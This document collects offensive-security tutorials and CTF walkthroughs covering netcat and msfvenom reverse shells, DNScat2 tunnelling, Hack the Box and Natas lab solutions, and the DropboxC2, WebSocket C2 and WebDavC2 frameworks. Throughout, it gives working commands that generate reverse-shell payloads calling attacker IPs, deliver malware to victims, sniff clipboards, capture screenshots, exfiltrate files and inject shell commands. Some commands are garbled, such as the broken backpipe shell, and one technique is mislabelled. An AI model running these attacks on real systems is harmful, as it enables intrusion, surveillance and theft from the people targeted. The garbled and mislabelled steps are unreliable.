Reverse TCP Shell Exploitation

We can exploit a system using a combination of msfvenom and netcat. We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe

We are using the shell_reverse_tcp payload to get a session. We have provided with Local IP address and port and then exported the script inside an Executable(exe) file. Now we will create a listener using netcat on the port we provided during the payload creation. We will now have to send the payload file to the target. When the target will run the executable file, we will get a session on our netcat listener.

nc -lvvp 2124

Randomize Port

If we can’t decide our very own port to start listener or establish our Netcat connection. Well netcat has a special -r parameter for us which gives us randomize local port.

nc -lv -r

File Transfer

Netcat can be used to transfer file across devices. Here we will create a scenario where we will transfer a file from a windows system to Kali Linux system. To send the file from the Windows, we will use the following command.

nc -v -w 30 -p 8888 -l < C:\netcat\output.txt

Now we will have to receive the file shared on Kali Linux. Here we will provide netcat with the Windows IP Address and the port which hosts the file. And write the output inside a text file. For doing this we will use the following command:

nc -v -w 2 192.168.1.4 8888 > output.txt

Reverse Netcat Shell Exploitation

We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R

So, when you execute the above command; you will get another command that has to be run in the target system, as shown in the image below, you will have your session as shown in the image above.

Another way to have a reverse shell is by executing the following command in the target system :

mknod /tmp/backpipe p

/bin/sh 0

/tmp/backpipe

And then when you start netcat as shown in the image below, you will have a session.

Banner grabbing

To grab the target port banner from netcat, use the following command :

nc -v 192.168.1.2 22

So, this was a basic guide to netcat. Its quite an interesting tool to use as well as it is pretty easy.

In this article, we learn DNS tunnelling through an amazing tool i.e. DNScat2

Table of Content :

· Introduction to DNS

· Introduction to DNScat

· Installation

· DNS tunnelling

· Conclusion

Introduction to DNS

The Domain Name System (DNS) associate’s URLs with their IP address. With DNS, it's conceivable to type words rather than a series of numbers into a browser, enabling individuals to look for sites and send messages utilizing commonplace names. When you look for the domain name in a browser, it sends a question over to the DNS server to coordinate the domain with its IP. When found, it utilizes the IP to recover the site's content. Most astonishingly, this entire procedure takes just milliseconds. For all this working, it uses the port 53.

Introduction to DNScat

DNScat is such praised tool because it can create a command and control tunnel over the DNS protocol which lets an attacker work in stealth mode. You can access any data along with uploading and downloading files and to get a shell. For this tool to work over 53 port, you don't need have authoritative access to DNS server, you can just simply establish your connection over port 53 and it will be faster and it will still be sensed as usual traffic. But it makes its presence well known in packet log.

DNScat is made of two components i.e. a server and a client. To know the working of dnscat, it is important to understand both of these components.

The client is intended to be kept running on a target machine. It's written in C and has the least amount of the prerequisites. When you run the client, you regularly indicate a domain name. All packets will be sent to the local DNS server, which are then directed to the legitimate DNS server for that domain (which you, apparently, have control of).

The server is intended to be kept running on a definitive DNS server. It's developed in ruby, and relies upon a few distinct gems. When you run it, much like the client, you indicate from which domain(s) it listens to over 53. When it gets traffic for one of those domains, it endeavours to set up a legitimate association. If gets other traffic it will automatically disregard it but, however, it can also advance it upstream.

Installation

Run the following git command to download dnscat2 :

git clone https://github.com/iagox86/dnscat2.git

Now install bundler as it is a major dependency for dnscat2. To install bundler go into the server of dnscat2 and type :

gem install bundler

bundle install

Once everything is done, the server will run with the following command :

ruby dnscat2.rb

Similarly, download dnscat2 in the client machine too. And use make command to compile it with server, as shown in the image below :

To establish a connection between client and server, use the following command :

./dnscat2 –dns-server=192.168.174.131,port=53

Once the connection is established, you can see on the server side that you will have a session as shown in the image below. You can use the command ‘sessions’ to check for a session that is created.

To interact with the said session type the following command :

session -i 1

As you can access the session now, use the word ‘ping’ to ping the target and if it replies ‘Pong!’ then you ping is successful.

Following will be the response on the client side of the ping command.

Further will the help command you can see all the options that we can use to our advantage. If you want to go to the shell then just type ‘shell’ and it will open a new window with the session to interact with the shell of the target system.

To interact with the shell session that is opened in a new terminal, type following set of commands :

windows

session -i 2

Once you are in the session, you can execute any shell command like ‘uname -a’ as shown in the image above.

DNS tunnelling

DNS tunnelling is the best attack through DNScat2. If through ifconfig you find two networks in your target system, as shown in the image below, you can easily perform DNS tunnelling.

For DNS tunnelling, type the following command :

listen 127.0.0.1:888 10.0.0.10:22

Now you can try and connect to the SSH port with the following command :

ssh cell@127.0.0.1 -p 888

Then, once connected, you can use ‘ifconfig’ command to see the network you have tunnelled for as shown in the following image :

As you have SSH control of the second network too, you can download DNScat2 in the said network too, in order to attack that network as well. Once you have downloaded DNScat2 in that network, type the following command to run it and have you session on the DNScat2 server :

dnscat2.exe –dns+server+192.168.174.131,port+53

Once the above command is executed, you will have a new session that you can access with the following set of commands :

sessions

session -i 2

And once you have access of the session, you can run any command.

Conclusion

Even in the most confined situations, DNS traffic ought to be permitted to determine inner or outside network. This can be utilized as a correspondence channel between an objective host and the command and control server. Command and information are contained inside DNS inquiries and identification that is why detection is troublesome since arbitrary command hides in plain sight due it being perceived as legitimate traffic. And this is exactly what DNSCat takes advantage of, making it a successful tool to attack.

Today we are going to solve another CTF challenge “Curling”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Curling is 10.10.10.150

Penetrating Methodology

Network scanning (Nmap)
Surfing the IP address on the browser
Finding Secret View Page Source
Decoding Secret
Enumerating Joomla!
Creating Payload using msfvenom
Getting Meterpreter Session
Enumerate and Extract password files
Getting SSH Session
Grab User Flag
Enumerate for Root Flag
Getting the root flag

Walkthrough
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -sV -sC -T4 -p- 10.10.10.150

The Nmap scan shows 2 open ports: 22(SSH), 80(HTTP)
As port 80 is running HTTP service, we open the IP address in the web browser.

Here, we found two usernames Floris & Super User. They might come in handy later on. Let’s view the Page source of the webpage.

Let’s open the secret.txt in the browser. It displayed a base64 encoded string.

Time to decode this base64 encoded string. So, on decoding it we got Curling2018! This can be used as a credential.

echo “Q3VybGluZzIwMTgh” | base64 -d

Due to previous experience with Joomla! We already knew about its administrator login page. Not wasting our time we directly opened /administrator directory in the browser along with the credentials.

Username- Floris

Password- Curling2018!

We have successfully logged in.

We have created a PHP shell payload using msfvenom.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.120 lport=443 -f raw

On the other hand, we have setup listening using Metasploit-framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run

Let’s try to upload php reverse shell script which we have created using msfvenom. Let’s first navigate to /template/protostar/ on the webpage.

Finally, we have got the meterpreter.

We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.

shell

python3 -c “import pty;pty.spawn(‘/bin/bash’)”

After enumerating through directories, we found a useful file password_backup. Let’s check its contents. The contents of this file look like hexdump.
ls -al
cat password_backup

Let’s use an xxd tool which is used to create gex dump of the given file or standard input. On decompressing the file we saw the author of the machine has recursively compressed the password_backup file. We need to recursively decompress it.
xxd -r password_backup > password
file password
mv password password.bz2
bzip2 -d password.bz2
ls
file password
mv password password.gz
gzip -d password.gz
ls
file password
mv password password.bz2
bzip2 -d password bz2
ls
mv password password.tar
tar xvf password.tar
cat password.txt

The content found in password.txt might be the password to login into SSH. Let’s find out if our intuition is true or not.

We have successfully logged into SSH using the password found in password.txt.

ssh floris@10.10.10.150

On exploring, we found User.txt and read its contents.

cat user.txt

On further enumerating, we found two files input & report in the admin-area folder. Let’s read the contents of both the files.

cat input

wc - l report

After sometime of thinking, we thought of changing the content of the input file using echo.

ls -al

echo file:///root/root.txt > input

It took us time to think about it. We did this because we knew our final flag is inside /root/root/txt. And also came to know the output of the input file will be saved in the report file.

Now after some time when we opened the report file. We found our Final Flag and read its contents.

wc - c report

cat report

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing Years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Kage is a GUI for Metasploit RCP servers. It is a good tool for beginners to understand the working of Metasploit as it generates payload and lets you interact with sessions. As this tool is on the process of developing, till now it only supports windows/meterpreter and android/meterpreter. For it to work, you should have Metasploit installed in your system. The only dependency it requires is npm.

Installations

Use the following git command to install the kage software :

git clone https://github.com/WayzDev/Kage.git

Go inside the kage folder and install nmp with the following command :

apt-get install npm

Further use the following command :

npm install

And then run it with the following command :

npm run dev

Once all the perquisites are done, the kage will run. Click on the start server button as shown in the image below :

The server will start running. Once all the process are done, click on close button as shown in the image below :

After click on the close button, it will automatically take all the details, and then you can click on the connect button to connect as shown in the image below :

Once you are connected, it will show you the following windows :

Under the heading payload generator, you can give all the details such as file name (kage.exe), payload (windows/meterpreter/reverse_tcp), lhost (192.168.1.9), lport (5252) and then click on generate.

After clicking on generate, it will create a new folder named kage (with small k), here, run python server so that you can share your malware with the victim. To run the python server, type :

python -m SimplpeHTTPServer 80

Once the file is shared and executed, it will show the following details under the jobs heading :

And when you go the sessions window through the dashboard, you will find a new session that has been created. Click on interact button to access the session.

After clicking on interact button, the following window will open. Here, first tab will show you all the information about the system.

The second tab will show you all the processes that are running on the victim’s PC.

And the third tab will give you all the information about its network. Here, you can use three commands through buttons provided and i.e. ifconfig, netstat, route, as shown in the image below :

In this article, we will learn about Nessus which is a network vulnerability scanner. There are various network vulnerability scanners but Nessus is one of the best because of its most successful GUI. Therefore, it is widely used in multiple organizations. The tools were developed by Renuad Deraison in the year 1998.

Table of Content

· Introduction to Nessus

· Linux Installation

· Running Vulnerability Scans

· Windows Installation

Introduction to Nessus

Nessus is an open-source network vulnerability scanner that utilizes the Common Vulnerabilities and Exposures engineering for simple cross-connecting between agreeable security instruments. Nessus utilizes the Nessus Attack Scripting Language (NASL), a basic language that portrays singular dangers and potential assaults. Nessus has a measured design comprising of incorporated servers that direct examining, and remote customers that take into account chairman communication. Executives can incorporate NASL portrayals of every presumed powerlessness to create altered outputs. Noteworthy abilities of Nessus include:

· Compatible with all OS

· Scans for vulnerabilities in the local and remote host

· Informs about missing security in detail

· Applies various attacks in order to pinpoint a vulnerability

· It can schedule security audits

· Runs security tests

Linux Installation

Let’s start the installation on Linux. Here we are installing Nessus on an Ubuntu 18 Machine. Firstly, we will invoke a root shell using sudo bash command. We are going to install Nessus using a deb file that can be downloaded from the Nessus Official Website. We traverse to the directory where we have downloaded the deb file. We will change permission to execute the file and then we will install the Nessus.deb file using the dpkg command.

chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb

dpkg -I Nessus*.deb

Afterward, as shown in the image using the following command to run Nessus :

/etc/init.d/nessusd start

This command will open our default browser, which in our case is Mozilla Firefox. And we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. First click on Advanced followed by Accept the Risk and Continue.

Then it will ask you to create an account, as shown in the image, give the details for it.

Further, it will ask you for an activation code, provide that just as its shown in the image below :

Once all the formalities are done, Nessus will open and will allow you to perform any scan you desire as shown in the image below :

Running Vulnerability Scans

When you click on create new scans, there will be multiple scans that you can see in the following image :

And then in the policies tab, you can generate different policies on which the scans are based.

There are various policies templates too, as shown in the image below :

In order to start a new scan, go to scan templates and select a new scan and then give it a name and target IP as shown in the following image :

Once the scan is done, it will show you the result; this result will clearly indicate the risk that a vulnerability poses which goes from low to critical.

When you click on the vulnerability, for instance here we clicked on the first one which is a critical threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :

Now, we clicked on the different one which is a high-level threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :

Windows Installation

Download Nessus for windows from Nessus Official Website. And open it similarly in the browser to set it up.

Just like in Linux, we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. First click on Advanced followed by Accept the Risk and Continue.

Then it will ask you to create an account, as shown in the image, give the details for it.

Further, it will ask you for an activation code, provide that just as its shown in the image below :

And then you can start your scans in a similar way just as shown above in Linux.

Today, we will play a war-game called Natas. It has a collection of 34 levels. OverTheWire Organization hosts this war-game. Absolute Beginners are the target audience. It teaches the basics of serverside web-security in a fun and challenging way. To play this war-game, go to the Natas website by clicking here.

Objective

Find the password to login on to the next level.

Table of Content:

Introduction

Level 0

Level 0 → Level 1

Level 1 → Level 2

Level 2 → Level 3

Level 3 → Level 4

Level 4 → Level 5

Level 5 → Level 6

Level 6 → Level 7

Level 7 → Level 8

Level 8 → Level 9

Level 9 → Level 10

Introduction

Natas have levels designed in such a way that each level has a different website. To reach each website we will enter the URL in this format.

http://natasX.natas.labs.overthewire.org, where X is the Level Number.

To access a level, we will use the username for that level (e.g. natas0 for level 0) and its password. The password for the next level is hidden on the current level. We will have to enumerate the password for the next level that is hidden in the current level. All the passwords are stored at /etc/natas_webpass/.

Level 0

This is a pretty simple level. We have the login credentials given on the Natas Introduction Page. Just browse the URL given below and enter the login credentials.

URL: http://natas0.natas.labs.overthewire.org

Username: natas0

Password: natas0

Level 0 → Level 1

On successfully logging in the natas0 webpage, we will have a message in front of us. It says “You can find the password for the next level on this page” as shown in the figure given below.

Now as per convention, let’s try to find something inside the source code. To view source code, we will right click on the webpage and select ‘View Page Source’. And there we have the password commented in the source code.

Level 1 → Level 2

We use the credentials we extracted from the previous level to login into Level 1.

URL: http://natas1.natas.labs.overthewire.org

Username: natas1

Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto

On successfully logging in the natas1 webpage, we will have a message in front of us. It says “You can find the password for the next level on this page, but rightclicking has been blocked!” as shown in the figure given below.

Now as right-clickingis disabled to view source code, we will have to find another way to retrieve the password form the source code. As we were using Mozilla Firefox and to open source code, we use ‘Ctrl + U’ shortcut.And there we have the password commented in the source code.

Level 2 → Level 3

We use the credentials we extracted from the previous level to login into Level 2.

URL: http://natas2.natas.labs.overthewire.org

Username: natas2

Password: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

On successfully logging in the natas2 webpage, we will have a message in front of us. It says “There is nothing on this page” as shown in the figure given below.

So, we check the Source Code of the page, here we find that we have an image file named pixel.png located in the files directory

We opened the files directory as shown in the image given below. In this directory, we find the user.txt file.

On opening it we find the passwords for the various users present on the target machine. But we need the password for the natas3.

Level 3 → Level 4

We use the credentials we extracted from the previous level to login into Level 3.

URL: http://natas3.natas.labs.overthewire.org

Username: natas3

Password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

On successfully logging in the natas3 webpage, we will have a message in front of us. It says “There is nothing on this page” as shown in the figure given below.

So, we check the Source Code of the page, here we find a commented hint. It says "Not even Google will find it this time". Search Engine spiders always leave the links that are disallowed the robots.txt file. So, we thought to check if this website has one.

We opened the robots.txt as shown in the image given below. In this file, we find that the /s3cr3t/ directory is disallowed. So, let’s open and see for ourselves what's inside the s3cr3t directory.

In this directory,we find the user.txt file.

On opening it we find the login credentials of the user natas4

Level 4 → Level 5

We use the credentials we extracted from the previous level to login into Level 4.

URL: http://natas4.natas.labs.overthewire.org

Username: natas4

Password:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

On successfully logging in the natas4 webpage, we will have a message in front of us. It says “Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"”as shown in the figure given below.

We capture the request in Burp Suite, here we see that there is a parameter named Referer. It says natas4.

We change that Referer parameter value to Natas5 as shown in the image given below.

After Forwarding the Request, we get the credentials of the user natas5.

Level 5 → Level 6

We use the credentials we extracted from the previous level to login into Level 5.

URL: http://natas5.natas.labs.overthewire.org

Username: natas5

Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

On successfully logging in the natas5 webpage, we will have a message in front of us. It says “Access disallowed. You are not logged in” as shown in the figure given below.

We capture the request in Burp Suite, here we see that there is a parameter named loggedin. It is set to 0.

We change that loggedinparameter value to 1 as shown in the image given below.

After Forwarding the Request, we get the credentials of the user natas6.

Level 6 → Level 7

We use the credentials we extracted from the previous level to login into Level 6.

URL: http://natas6.natas.labs.overthewire.org

Username: natas6

Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

On successfully logging in the natas6 webpage, we will have a form in front of us. It says "Input secret:" as shown in the figure given below.

We went ahead and look for some clues for that secret that we will have to enter in order to get the credentials for the next level. Here we see that a file is included called 'secret.inc'.

So, in order to grab the secret, we will browser the included file manually. So, as we can see in the given image, we can see that weadd the /include/secret.inc in the URL. This gave us a blank page in response. So, we browsed the source code to find the secret commented on the webpage.

Now we copied the secret and went back to the form which was asking the secret. After entering the secret, we get the login credentials for the next level.

Level 7 → Level 8

We use the credentials we extracted from the previous level to login into Level 7.

URL: http://natas7.natas.labs.overthewire.org

Username: natas7

Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

On successfully logging in the natas7 webpage, we are given two links, Home and About as shown in the figure given below.

So, we check the Source Code of the page,

Here, we can see the links "index.php?page=" in the given image. We have also hinted the location of the password, that is., /etc/natas_webpass/natas8.

As we can see in the given image, the link is shown in the address bar of our browser after clicking the Home link.

So, we modify the link to read the password stored in the natas_webpass.

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

And we have the password for the next level. This is called command injection.

Level 8 → Level 9

We use the credentials we extracted from the previous level to login into Level 8.

URL: http://natas8.natas.labs.overthewire.org

Username: natas8

Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

On successfully logging in the natas8 webpage, we will have a form in front of us. It says "Input secret:" as shown in the figure given below.

We opened the source code and found that the secret is encoded. Also, we have a function which encodes the secret.

Hence to decode the secrete we just create a function that can decode the secret. This can be done as shown in the given image.

php -a

echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));

As we now have the decoded secret, we can use it extract the credentials from the webpage of natas8 as shown in the given image.

Level 9 → Level 10

We use the credentials we extracted from the previous level to login into Level 9.

URL: http://natas9.natas.labs.overthewire.org

Username: natas9

Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

On successfully logging in the natas9 webpage, we will have a form in front of us. It says "Find words containing" as shown in the figure given below.

We opened the source code and found that when we enter a keyword, it is passed via a function called passthru(). It takes the value in $key and executes it directly.

So, we will use (;) to execute multiple commands. We will try to read the password atthe next level.

;cat /etc/natas_webpass/natas10

As we can see that the password is printed on the screen as shown in the given image.

Level 10 → Level 11

We use the credentials we extracted from the previous level to login into Level 10.

URL: http://natas10.natas.labs.overthewire.org

Username: natas10

Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

On successfully logging in the natas10 webpage, we will have a form in front of us. It says "For security reasons, we now filter on certain characters Find words containing" as shown in the figure given below.

We opened the source code and found that when we enter a keyword, it is passed via a function called passthru(). It takes the value in $key and it filters the input of the characters (/;|&) as shown in the given image.

So, we will use (.*) to execute multiple commands. We will try to read the password atthe next level.

.*/etc/natas_webpass/natas10

As we can see that the password is printed on the screen as shown in the given image.

In this article, we will learn how to use DropboxC2 tool. It is also known as DBC2.

Table of Content:

Introduction

Installation

Getting Dropbox API

Exploiting Target

Sniffing Clipboard

Capturing Screenshot

Command Execution

File Download

Introduction

DBC2 is primarily a tool for post-exploitation. It has an agent running on the target’s machine, a controller, running on any machine, PowerShell modules, and Dropbox servers as a means of communication. It is inspired by the PowerShell Empire Framework. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

git clone https://github.com/Arno0x/DBC2

After running the above command, we would have a directory created by the name of DBC2. Now, we will traverse inside that directory using the cd command. After that we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.

cd DBC2/

pip install -r requirements.txt

Getting Dropbox API

Now, this tool uses the Dropbox Servers as the medium to run agents on the target machine. In order to do that, this tool requires Dropbox API. To get that, first create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the “Dropbox API”. Then in the type of access section we will choose “App folder”. Name the app as per choice. Then click on Create App Button to proceed.

This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and

Generate access token. This will give the Dropbox API required for this particular practical.

Copy the Generated access token, now get to the directory we cloned earlier. Here we have a file named config.py. We will open it using nano command and paste the Access token as the value for “defaultAccessToken” as shown in the given screenshot given below.

Exploiting Target

Now, it’s time to run the tool, check for appropriate permission before running the tool. As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this it will ask for a master password which will be used to encrypt all the data between the agents and the controller. Enter the password of choice. It will encrypt the password entered and display the result. We can copy the code shown and add to the config.py file so that it doesn’t ask again for a master password. After this it will create an incoming directory inside the Directory we cloned earlier. This will used as a buffer to save files from the target.

python dropboxC2.py

This tool requires to upload the modules and stager on Dropbox before proceeding further. We will do this using the command given below.

publishStage dbc2_agent.exe

This will upload a file on the Dropbox as shown in the image given below. This file is encrypted using XOR encryption.

Now let’s check if the stage is published using the command given below:

listPublishedStage

Now that stage is uploaded, let’s use it to create a stager. We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in macro, oneliner, JavaScript, MS build sct and much more. This command will create a stager.bat in tmp directory. We sent this bat file to our target machine.

genStager batch default

After the batch file is executed on the target machine, we will be informed with a message on the terminal that Agent found with ID. Now we will use the list command to see the list of the agents. And then we will copy the AgentID and then use it to interact with the session as shown in the given image.

list

use [AgentID]

This will create a file on the Dropbox with the .status extension as shown in the given image.

Clipboard Sniffing

We can get the clipboard data that the target has on its clipboard. That is., the data he/she has copied. To do this we will have to start a sniffer using the command clipboardLogger start. Then wait till the target copies some data. Then Stop the sniffer using the command clipboardLogger stop. After stopping the sniffer the clipboard will be saved in a text file inside the incoming directory.

clipboardLogger start

clipboardLogger stop

Let’s take a look at what target copied on his/her machine. We are going to use the cat command on a new Kali terminal to read the file as shown in the give image.

cat /root/DBC2/incoming/clipboardlogger.txt

Capturing Screenshot

Now further more we can grab a screenshot of then target machine. To do this we will use the screenshot command as show in the given image.

screenshot

The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.

Command Execution

We can run some PowerShell commands on the target machine using the parameter cmd. This tool doesn’t offer the shell but it can execute one command at a time. So, we type cmd and then it asks the command that is to be executed. Here we run the command dir. And we have the list of files as shown in the given image.

cmd

dir

File Download

Furthermore, we can download files from the target. To do this we will have to use the command getFile followed by the file name or path. This will download the file form the target to our attacker machine.

getFile sharetext.txt

The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.

cat /root/DBC2/incoming/sharetext.txt

Hack the Box Vault: Walkthrough

Today we are going to solve another CTF challenge “Vault”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore, they have a static IP. The IP of Curling is 10.10.10.109

Penetrating Methodology

Network scanning (Nmap)
Surfing the IP address on the browser
Surfing directories on the browser
Using dirb for directory scanning
Creating Payload using msfvenom
Getting Meterpreter Session
Enumerating through directories
Getting SSH login credentials
Logging into SSH
Pinging Host IP
Scanning Ports on Host IP
Dynamic Port forwarding with SSH
Updating VPN Configuration file
Executing Netcat istener
Finding user.txt
Getting SSh Login Credentials
Using proxy command option
Escaping restricted shell
Using gpg to decrypt root.txt.gpg file
Converting file in base64 string using python3m
Using echo to decrypt the string
Reading our Root Flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -p- -sV -sC 10.10.10.109

As port 80 is running HTTP service, we open the IP address in the web browser.

We thought of opening sparklays in the browser along with the Machines IP. But it turned out to be forbidden.

We don’t find anything on the web page, so we further enumerate the web service using dirb scan.

dirb http://10.10.10.109/sparklays/-w

From dirb scan we found a useful directory /design/design.htmlwhich we opened in the browser. Since the only thing left to do on this Page is to click on Change Logo.

It redirected us on a File Upload Page.

Now we have used msfvenom to generate malicious PHP file.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.13.234 lport=1234 -f raw > shell.php5

We have successfully uploaded the malicious file.

Let’s open our malicious file using the browser.

Finally, we have got the meterpreter.
sysinfo

While looking for our first flag, we have some useful credential for ssh login.
Username- dave
Password- Dav3therav3123
cd Desktop
ls -al
cat Servers
cat key
cat ssh

Time to login into ssh.
Username- dave
Password- Dav3therav3123

We use the ping command to find all the available machines on the subnet “192.168.122.1/255”.
for i in {1..255}; do ping -c 1 192.168.122.$i | grep ‘from’ ; done

Let’s use the following command to scan the ports of 192.168.122.4 to see what we are up against.

Now connect to client machine using the command below.
ssh -D 8080 dave@10.10.10.109
Password- Dav3therav3123

The proxy on the browser is set up to point to socks5://127.0.0.1:8080.
Let’s open the IP 192.168.122.4 in the browser. And see where it directed us. Click on VPN Configuration link.

It directed us to page where we need to update the VPN file. We have found the details in Test VPN link.

Simply we have pasted and modified the details in which we have given the IP address of the Target Machine along with port 1234. Click on update file.

On the other hand, we have executed listening on port 1234.
nc -lvp 1234
We have easily got the root access. Enumerating directories to find user.txt.
cd /root
ls
ls -al

After some digging, we have found our first flag.
ls
cd dave
ls
cat user.txt

Now we thought of reading the logs, we were totally out of hints. While looking at the logs we found something interesting. We saw that firewall is accepting inbound traffic from port 4444/tcp to host 192.168.5.2 which is listening at 987/tcp.
So, to find out, what’s running on 987/tcp. Use the following command.
ncat -p 4444 192.168.5.2 987
It came out be SSH service.

We again found Credentials for SSH Login.
Username- dave
Password- dav3gerous567
cat ssh

What are we waiting for, time to log into SSH, here we again found User.txt.
ssh dave@192.168.122.4
Password- dav3gerous567
ls
cat user.txt

Since dave has a restricted default shell, so we are using proxy command to re-login.
ssh -o ‘Proxycommand ncat -p 4444 %h %p’ -p 987 dave@192.168.5.2

After logging in as user “monitor” we find that we have a restricted shell. We are not able to change the SHELL variable. After spawning a TTY shell, we are able to change the SHELL environment variables.
echo $SHELL
export SHELL=/bin/bash:$SHELL
python
bash
export SHELL=/bin/bash:$SHELL

We tried decrypting the file root.txt.png but couldn’t succeed. Since it requires a secret key.
gpg -d root.txt.gpg

There are not many options left, let’s convert into a base64 encoded string using python3m.
python3m -c “import base64;print(base64.b64encode(open(‘root.txt.gpg’, ‘rb’).read()))”

We have copy & pasted the encoded string to the ubuntu machine and decrypted it. Since we have found the paraphrase ‘itscominghome’we can easily open the file root.txt.gpgto read our final flag.

Finally, we have read our Final Flag.
gpg -d root.txt.gpg

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing 2.5 Years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Command and Control Guide to WebSocket C2

In this article, we will learn how to use WebSocket C2 tool. It is also known as WSC2.

Table of Content:

Introduction
Installation
Exploiting Target
Command Execution
File Download

Introduction

WSC2 is primarily a tool for post-exploitation. WSC2 uses the WebSocket and a browser process. This serves as C2 communication channel between an agent, running on the target system, and a controller acting as the actual C2 server. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

git clone https://github.com/Arno0x/WSC2.git

After running the above command, we would have a directory created by the name of WSC2. Now, we will traverse inside that directory using the cd command. Let’s see the contents of the directory that we just cloned using the ls command.

cd WSC2/

After that we are going to need to install the dependencies of the tool. There are multiple ways to do this, but here we are using pip command along with a requirements.txt file that we cloned from git earlier.

pip install -r requirements.txt

As we saw earlier that we have a config.py file inside the cloned directory. We have to make some changes inside this config.py file so as to get the session on our system. We used nano to edit the file. As shown in the figure, when we opened the config.py file using nano, we found a variable CALLBACK. It has an IP Address. We changed it to the IP Address of our Attacker Machine i.e Kali Linux.

nano config.py

Exploiting Target

./wsc2.py

We are going to create a batch file. But we can use many other types of stager options. This tool provides stager in jscript1, jscript2, jscript3. We are using jscript1 here because it is not required to compile. Rest of the stagers are required to compile. This command will create a wsc2Agent1.js in stagers directory.

genStager jscript1

Now let’s get the file to the target machine. To do this we will open up a new terminal and traverse into the stagers directory using the cd command. Here, we are using the python server to share the file to the target. This can be done using any other method of choice.

cd stagers/

python -m SimpleHTTPServer 80

After the jscript file is executed on the target machine, we will be informed with a message on the terminal that New agent connected. Now we will use the list command to see the list of the agents.

list

And then we will copy the AgentID and then use it to interact with the session as shown in the given image.

use [AgentID]

Command Execution

We can run some PowerShell commands on the target machine using the command cli. Here we run the command dir. And we have the system information of the target as shown in the given image.

cli

systeminfo

File Download

help getFile

getFile sample_text.txt

The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.

cd incoming/

cat sample_file.txt

In this article, we will learn how to use WebDav C2 tool.

Table of Content:

Introduction
Installation
Exploiting Target
Command Execution

Introduction

WebDavC2 uses the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actual C2 server. This tool is developed using python. The credit for developing this tool goes to Arno0x0x.

WebDavC2 is composed of a controller, which acts as the C2 server. It also comprises of an agent, written in C#/.Net, running on the target system. It is delivered to the target system via various initial stagers. It also consists of various types of initial stagers (created on the fly when the controller starts) used for the initial compromisation of the target system.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, first we need the tool on our Attacker Machine. To do this, we will clone the tool directly from the GitHub.

git clone https://github.com/Arno0x/WebDavC2

cd WebDavC2/

chmod +x webdavC2.py

Exploiting Target

As we run the tool, we are greeted with a cool looking banner as shown in the given below. Followed by some details about the Author and Version and tool. After this it will create multiple stagers in Batch, Macro and Jscript as shown in the figure below. It also starts an WebDav Server at the IP provided at port 80.

python webdavC2.py

